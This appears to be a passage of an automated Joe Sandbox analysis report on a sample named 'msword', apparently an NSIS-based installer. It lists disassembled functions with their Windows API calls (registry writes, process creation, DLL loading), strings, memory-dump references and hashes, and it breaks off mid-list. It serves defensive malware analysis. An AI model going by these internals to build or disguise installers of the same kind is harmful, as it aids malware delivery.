                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                        • String ID: F
                                                                                        • API String ID: 941294808-1304234792
                                                                                        • Opcode ID: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                        • Instruction ID: e7530e13063599d95e155ed3b2c7b7521dfa2668d538c4695d9c695e9582dc0d
                                                                                        • Opcode Fuzzy Hash: f4369597f17a3e87964d78a18e042c43d151941ad2c2ecd61bd33e0f0092c561
                                                                                        • Instruction Fuzzy Hash: 01516C71400209AFCB058F95DE459AF7FB9FF45311F00802EF992AA1A0CB78DA55DFA4
                                                                                        Function 00402880 Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 131registrystringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                        • lstrlenW.KERNEL32(004130D8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                        • RegSetValueExW.ADVAPI32(?,?,?,?,004130D8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        Strings
                                                                                        • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                        • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                        • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                        • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                        • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                        • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                        • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                        • API String ID: 1641139501-220328614
                                                                                        • Opcode ID: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                        • Instruction ID: 4ea7a0066738be70411365ddd6f3e5606018e51d84950e7919a1ab5782edcef9
                                                                                        • Opcode Fuzzy Hash: 51d35262b0c2a2c9e21de093e360e43a16013741a0d7e0050a8341ec78c57d1d
                                                                                        • Instruction Fuzzy Hash: 3D41BFB2D00209BFDF11AF90CE46DAEBBB9EB04704F20407BF505B61A1D6B94B509B59
                                                                                        Function 00402E55 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 103memoryfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                        • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                        • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                        • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                        Strings
                                                                                        • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                        • String ID: created uninstaller: %d, "%s"
                                                                                        • API String ID: 3294113728-3145124454
                                                                                        • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                                        • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                                        Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                        • API String ID: 3734993849-2769509956
                                                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                                        Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                        • String ID:
                                                                                        • API String ID: 2320649405-0
                                                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                                        Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                        Strings
                                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                                        • API String ID: 1033533793-945480824
                                                                                        • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                                        • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                                        Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                        Strings
                                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                                        • Exec: command="%s", xrefs: 00402241
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                        • API String ID: 2014279497-3433828417
                                                                                        • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                                        • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                                        Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Send$ClientScreen
                                                                                        • String ID: f
                                                                                        • API String ID: 41195575-1993550816
                                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                                        Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                        • MulDiv.KERNEL32(0000E400,00000064,?), ref: 00403295
                                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                        Strings
                                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000048F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B3000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004B7000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.00000000004BF000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049877101.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_16_2_400000_msword.jbxd
                                                                                        Similarity
                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                        • String ID: verifying installer: %d%%
                                                                                        • API String ID: 1451636040-82062127
                                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                                        Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                                        • wsprintfW.USER32 ref: 00404457
                                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000010.00000002.2049557691.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000010.00000002.2049529263.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049587628.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.000000000042B000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                        • Associated: 00000010.00000002.2049618405.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
